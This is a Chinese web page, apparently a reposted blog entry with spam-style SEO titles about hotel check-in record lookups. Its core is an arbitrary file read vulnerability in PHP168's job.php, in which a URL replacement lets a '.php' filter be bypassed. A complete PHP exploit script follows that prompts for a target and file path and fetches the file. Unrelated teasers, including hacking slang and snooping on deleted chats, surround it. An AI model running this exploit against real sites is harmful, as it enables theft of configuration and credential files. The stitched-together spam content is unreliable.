怎么样才能查开房记录) 查询开房记录开房记录
| 转载地址:http://hi.baidu.com/saiy_hi/哦,忘记说了,程序官方URL:http://www.php168.com/#代码:..job.php Line:117 if( eregi(".php",$url) ){ die("ERR"); } $fileurl=str_replace($webdb[www_url],"",$url); if(is_file(PHP168_PATH."$fileurl")&&filesize(PHP168_PATH."$fileurl")<1024*1024*500){ $filename=basename($fileurl); $filetype=substr(strrchr($filename,'.'),1); $_filename=preg_replace("/([\d]+)_(200[\d]+)_([^_]+)\.([^\.]+)/is","\\3",$filename); if(eregi("^([a-z0-9=]+)$",$_filename)&&!eregi("(jpg|gif|png)$",$filename)){ $filename=urldecode(base64_decode($_filename)).".$filetype"; } ob_end_clean(); header('Last-Modified: '.gmdate('D, d M Y H:i:s',time()).' GMT'); header('Pragma: no-cache'); header('Content-Encoding: none'); header('Content-Disposition: attachment; filename='.$filename); header('Content-type: '.$filetype); header('Content-Length: '.filesize(PHP168_PATH."$fileurl")); readfile(PHP168_PATH."$fileurl"); }else{ $fileurl=strstr($url,"://")?$url:tempdir($fileurl); header("location:$fileurl"); }在这段代码里,有判断url里是否包含.php,但是在接下来,这里有个替换$fileurl=str_replace($webdb[www_url],"",$url);.p$webdb[www_url]hp被替换后就是.php,但是可以顺利通过前面的是否存在.php的判断。我没有安装这个代码,但是搜索了一下代码,$webdb[www_url]应该是Web的URL地址。结论是:可以读取任意文件。我写了一个Exp来读取文件,但是由于没有安装php168,所以如果有人愿意测试就安了~由于以前写的EXP太不人性化了,现在连输入变量的方式都改变了~~~php php168.php运行就好了 PHP代码 <?php make_input('url','请输入Php168程序所在的地址,例如http://www.xxx.com/'); while(1){ if(substr($url,0,7)!=='http://')make_input('url','大哥,这怎么可能是万维网所说的Url嘛,专业点'); elsebreak; } if(substr($url,0,-1)!=='/')$url.='/'; //如果URL的最后一位不是/,补全之 if(!$tmp=@file_get_contents($url.'job.php'))die('哦,你耍我,我不往下跑了。'); //如果读job.php为空,就不跑了,跑的辛苦。 make_input('file_path','先生,你想读个啥文件呢?'); $query=str_replace('php','ph'.$url.'p',$file_path); $hack_url=$url.'job.php?url='.base64_encode($query); $result=file_get_contents($hack_url); echo$result; die; functionmake_input($name,$msg="请输入{name}的值",$type='text'){ //Web:http://hi.baidu.com/saiy_wowman/ global$$name; if(isset($$name))$$name=''; while(1){ if(!isset($$name)||$$name==''){ $msg=str_replace('{name}',$name,$msg); echo$msg."\r\n"; $_input=trim(fgets(STDIN)); if($_input!==''){ if($type=='int'){ if(is_numeric($_input)){ $$name=$_input; break; } }else{ $$name=$_input; break; } } }else{ break; } } } ?> |
相关文章
黑客抓鸡图片(黑客抓肉鸡什么意思)
本文导读目录: 1、谁懂网络上常说的抓鸡是什么意思? 2、黑客术语中,什么叫“跳板”和“抓鸡”? 3、关于黑客抓鸡 4、黑客平时经常所说的“抓鸡”是什么意思? 5、黑客术语[抓鸡]什么...
游客景区5脚踹断仙人掌
相信现在有好多小伙伴们拿这手机都在看游客景区5脚踹断仙人掌事情吧,因为在这两天游客景区5脚踹断仙人掌的热度是非常高的,受到了广大网友们的关注,那么既然现在大家都非常关注游客景区5脚踹断仙人掌,这里小编...
杨超越金句集锦 杨超越搞笑经典语录
孟美岐在演艺圈中就好像是很尤其的一个存有,如今愈来愈多的人被她吸粉,由于她很真正将自身的一面呈现出去,每一次讲话出乎意料,曝出经典话语,下边我就产生孟美岐经典话语锦集。 孟美岐经典话语锦集 1...
什么是价值观?当下中国人的价值观到底是什么?
9月17日《北京日报》第14版 当代中国人价值观结构及特点 □傅蓉 郭齐勇 【阅读链接】 “中国人价值取向调查”问卷包括9个价值维度:人格品行、智慧教育、家庭情感、人际交往、职业发展、...
lol云顶之弈10.11新版本T1阵容 2020云顶之弈最强阵容
云顶之弈10.11最强阵容是哪个?新版本云顶之弈最强阵容怎么搭配?在5月29日云顶之弈进行了全新版本的更新,本次加入了全新星系。下面,就随琵琶网小编来了解一下当前版本最强阵容吧! 一、云顶之弈本...
查找男朋友删除微信聊天记录
孩子从床上摔下来之后怎么做好,小编觉得这个场景是所有的妈妈都不敢想的吧,毕竟是自己身上掉下来的一块肉,从床上掉下来不是心疼的紧啊,不过看到孩子从床上落下来了之后首先要看看孩子的状况,那么具体的应该怎么...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!